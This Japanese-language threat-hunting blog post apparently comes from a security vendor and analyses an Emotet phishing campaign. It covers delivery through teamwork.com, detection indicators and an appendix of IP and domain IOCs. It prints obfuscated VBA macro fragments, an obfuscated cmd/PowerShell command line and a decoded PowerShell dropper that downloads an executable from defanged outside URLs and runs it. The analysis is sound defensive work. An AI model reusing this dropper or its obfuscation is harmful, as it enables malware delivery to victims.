Emotet ハンティング

初回配信

12月の新たな脅威ランドスケイプの傾向として、第三者サイトへのリンクを含んだメールの急増が確認されました。メールに挿入されたリンクをクリックしサイトにアクセスすると、マクロペイロードを含んだWord文書をダウンロードするよう促されます。

ペイロードを配信しているサイトはさまざまで、攻撃者によって登録されたサイトもあれば、過去の攻撃によって侵害されたサイトもありました。Counterceptで見られた興味深い例としては、teamwork.comを使用して最初のドキュメントペイロードを配信するというものがありました。Teamworkは、自社のサブドメインやホストコンテンツを作成したい組織に役立つ反面、攻撃者にペイロードを配信する手段を与えてしまいました。

この一連の攻撃活動で、攻撃者は“enterpriseupdates”というサブドメインと“Sales-Invoice”というフォルダを使用して、アクセスしたユーザーに正当なサイトのように見せていました。使用されたフルアドレスは次下記の通りです。

hxxps://enterpriseupdates.teamwork.com/Sales-Invoice/

ホストされたドメインの全リストは、本ブログ末尾に掲載されています(1)。

ドキュメントペイロード

最初のドキュメントペイロードでは、ソーシャルエンジニアリングによってユーザーをだまし、マクロの実行を促します。

マクロペイロードは、文字エンコーディングと置換をフルに活用して、検知やリバーシングを回避していました。コードの一部を下記の通りです。

Attribute VB_Name = “OnWUPzGiPz”
Sub AutoOpen()
On Error Resume Next
VOCnXsrcL = 9 * Tan(2487 / 9591 – 7 + Chr(57 – Sin(7))) + 8 + ChrB(14 + Atn(8 / ChrW(5) + 4320 + Log(97)) – 9 / 12) – (13 – Cbool(881 – 9) * TmfXJir + Cos(10))
djPoCzMlo = 14 * Tan(2487 / 9591 – 7 + Chr(57 – Sin(13))) + 13 + ChrB(13 + Atn(14 / ChrW(5) + 4320 + Log(97)) – 12 / 14) – (14 – Cbool(881 – 11) * TmfXJir + Cos(7))

動的解析を通じて、ペイロードの実行済コマンドの抽出と、難読化が解除されたテキストの取得は簡単にできました。マクロはまずcmdを大量発生させ、次にpowershellプロセスを大量発生させていました。異常な親/子プロセスが、Counterceptによる異常検知の主要なインジケータの1つとなりました。

• 最初のマクロ実行 – winword.exe -> cmd.exe
• cmdからPowershellのローンチ – cmd.exe -> powershell.exe

rawコマンド引数を下に示します。難読化の多用自体が異常のインジケータとなり、皮肉にも活動を目立たせていました。

cmd hiouhOI jido fhoiwehipwmdklqwn whqoijpdwdp & %C^om^S^p^Ec% /V /c set %UfcOSmsFlTRZbCd%=vTofQRpIAdE&&set %DJmbfqzcEOAi%=o^we^r^s&&set %FHddmvtrWTDusVN%=AMAaiPp&&set %jjwYoPpzc%=p&&set %iRZHwCqTNohnzHp%=fdiLHLsZvJCQovA&&set %iphSIiNfaNjTt%=^he^l^l&&set %DWqRzMNnzojzpFK%=iPtLhWsXHimrdwt&&!%jjwYoPpzc%!!%DJmbfqzcEOAi%!!%iphSIiNfaNjTt%! "(('((i4T(k9Brk9B+k9BOi4T+i4TNfrank9B+k9Bck9B+k9Bi4T+i4T = new-ok9B'+'+k9Bbjk9B+k9Bect System.k9B+ki4T+i4T9BNetk9B+k9B.Wk9B+k

また、難読化は実行されたPowershellコマンドにも適用されていました。難読化は、実行された Powershell コマンドにも適用されました。 この下の例の場合、Powershell拡張ログがあれば裏に潜むコマンドが簡単に明らかになった思われます。

powershell "(('((i4T(k9Brk9B+k9BOi4T+i4TNfrank9B+k9Bck9B+k9Bi4T+i4T = new-ok9B'+'+k9Bbjk9B+k9Bect System.k9B+ki4T+i4T9BNetk9B+k9B.Wk9B+k9Be'+'k9B+k9BbClk9B+k9Bien'+'t;rONk9'+'B+k'+'9Bnsk9B+k9Badask9B+k9Bd =k9B+i4T+i4Tk9B new-ok9B+k9Bbjk9B+k9B'+'ect
…
rEPlaCe 'JYX',[ChAr]124) |&( $sheLLid[1]+$ShEllId[13]+'X')
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

デコードされ、単純化されたPowershellセクションを次に示します。このPowershellドロッパーコードは、以前の攻撃活動でよく使用されていました。.

rONfranc = new-object System.Net.WebClient;
rONbcd = H1Ihxxp://coffeybarn.com/Qq3sDS0/,hxxp://easyfood.us/G4VaoW/,hxxps://icbb.unud.ac.id/0XSX0/,hxxp://festival-druzba.com.ua/r4Iwz/,hxxp://plan.goteborg2021.webadmin8.net/wp-content/themes/goteborg/fhYm/H1I.Split(H1I,H1I);
rONnsadasd = new-object random;
rONkarapas = rONnsadasd.next(1, 343245);
rONhuas = env:public + "\" + rONkarapas + ".exe";
foreach(rONabc in rONbcd){
try{
rONfranc.DownloadFile(rONabc.ToString(), rONhuas);
Invoke-Item(rONhuas);
break;}catch{write-host rON_.Exception.Message;}}|&(IEX)

難読化が解除されたPowershellで見られる単純なループは、ダウンロードする複数のドメインを繰り返し、第2段階のペイロードを実行するために使用されています。このファイルの名前はSystem.Random.Next()関数を使用して動的に生成されるもので、“177551.exe”といった名前が作成されています。

疑わしいPowershellコマンドの使用、アウトバウンドネットワーク接続、ならびにPowershellからのファイル作成は、Counterceptが悪意のある活動を特定するのに役立つ主要なインジケータとなりました。

セカンドステージ

前述のリサーチで説明したとおり、Emotetのコアコードは、OS、ハードウェア、および実行中のサービスなど、感染システムに関する情報を収集し、その情報をC&Cサーバーに中継します。接触時、マルウェアはダウンロードすべき自身の更新済バージョンがあるかどうかをチェックし、どのペイロードのダウンロードが予定されているか確認してから、引き続きC&Cサーバーに設定されているすべてのペイロードをダウンロードし、実行します。

Counterceptによって表示された第2段階ペイロードは追加のファイルをドロップします。使われる場所はユーザーの権限に応じて異なります。管理者アカウントがあれば“C:\Windows\SysWOW64”が使用され、そうでない場合は“%USERPROFILE%\AppData\Local\Microsoft\Windows”が利用されていました。表示されている変数は、“nvidiaflt.exe”や“cachetask.exe”といった名前を使用していました。

このペイロードは、管理者権限を使用して、永続性を獲得し、アクセス権を昇格させてSYSTEMとして実行するためのサービスをインストールしているようでもありました。たとえば次のとおりです。

このバイナリはまた、“C:\Windows\SysWOW64\cryptsec.exe”をロードし、追加のペイロードを実行する別のサービス“cryptsec”も作成していました。次に示すのは、親/子プロセス（加えてPID）です。

Name: nvidiaflt
Display Name: nvidiaflt
Path: %WINDIR%\SysWOW64\nvidiaflt.exe

これらのファイルの解析はこのブログの範囲外ですが、攻撃者はこの足掛かりを使用して、異なる機能を持つさまざまなペイロードをインストールできます。たとえばさらなるネットワーク感染を引き起こすワームモジュールやパスワード窃盗モジュール、または銀行を標的とする「Dridex」といった第2のトロイの木馬などです。

学んだ教訓

防衛の観点から、いくつかの重要な教訓があります。

• マクロベースの攻撃は引き続き、ペイロードデリバリの常套手段となるでしょう。
• エンドポイントの可視性により、侵害のあらゆる段階を徹底的に調査できます。
• 攻撃者は引き続き、Teamworkといった合法的なサービスを利用してマルウェアを拡散していくでしょう。
• ユーザーは常に警戒し、たとえ正当なサイトが使用されていても、メールに添付されたリンクを信用すべきではありません。

いつもながら、マクロを無効化し、アプリケーションをホワイトリスト化し、ASRルールを実装することで、このブログに記載されているキルチェーンの大部分を防止できます。

そのようなコントロールを実装できない多くの組織の場合、代わりとして検出に焦点を絞ることで、悪意のある活動を発見して抑え込み、安全を確保できます。さらなる将来の感染を防止するには、アクティブな攻撃の特定、調査、封じ込めができるセキュリティチームを結成することが鍵となります。

リファレンス

• http://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/

アペンディックス – 侵害指標:

 IP Addresses:

•  46.4.192.185
• 107.170.177.153
• 168.235.85.153
• 192.155.88.196
• 87.106.94.90
• 87.106.94.90
• 85.214.224.206
• 178.254.1.183
• 168.235.74.192
• 81.169.180.84
• 153.149.153.41
• 194.88.246.242
• 220.227.247.45
• 87.106.247.42
• 45.33.87.54
• 62.210.253.72
• 5.230.193.41

ドメイン名:

• hxxp://coffeybarn.com/qq3sds0/,
• hxxp://easyfood.us/g4vaow/,
• hxxps://icbb.unud.ac.id/0xsx0/,
• hxxp://festival-druzba.com.ua/r4iwz/,
• hxxp://plan.goteborg2021.webadmin8.net/wp-content/themes/goteborg/fhym/
• hxxp://wxw.cableweb.org/Overdue-payment/
• hxxp://logoswift.net/Invoice/
• hxxp://wxw.exxecutive.com/Invoice-Number-35464/
• hxxps://enterpriseupdates.teamwork.com/Sales-Invoice/
• hxxp://wxw.chooseordie.me/Outstanding-Invoices/
• wxw.finditinfondren.net/INCORRECT-INVOICE/
• wxw.nagelpilzbehandeln.info/Outstanding-Invoices
• hxxp://wxw.nagelpilzbehandeln.info/Outstanding-Invoices/
• wxw.imagemirror.ru/Invoice-Number-19700/
• hxxp://wxw.klesarstvo-antolasic.com/Invoices-Overdue/
• hxxp://wxw.farggrossisten.se/Sales-Invoice/
• wxw.hollywoodproducts.us/Invoices-Overdue
• hxxp://wxw.danmerkelmedia.com/Final-Account/
• hxxp://oceangroup.pl/Outstanding-INVOICE-NZXZ/5166934/2962/
• wxw.cableweb.org/Overdue-payment/
• hxxp://wxw.insuredmeds.com/Invoice/
• hxxp://wxw.finditinfondren.net/INCORRECT-INVOICE/
• hxxps://wxw.focussup.com/Outstanding-INVOICE-ECLPR/9243051/742/
• hxxp://wxw.jarealestateguide.com/Overdue-payment/
• hxxp://wxw.brewer.designgrotto.com/Invoice/
• hxxp://wxw.midsouthsigns.com/Invoice-81197936
• patriot-rus.ru/manager/Sales-Invoice/
• wxw.focussup.com/Outstanding-INVOICE-ECLPR/9243051/742/
• hxxp://aes-systems.org/KKW5-2637202022/
• hxxp://wxw.cmnoutdoor.com/Invoices-attached/
• hxxp://wxw.jaimelamaro.com/Invoices-attached/
• hxxp://wxw.finditinfondren.net/INCORRECT-INVOICE
• hxxp://wxw.app.feed.builders/Outstanding-INVOICE-HPQZY/868707/918/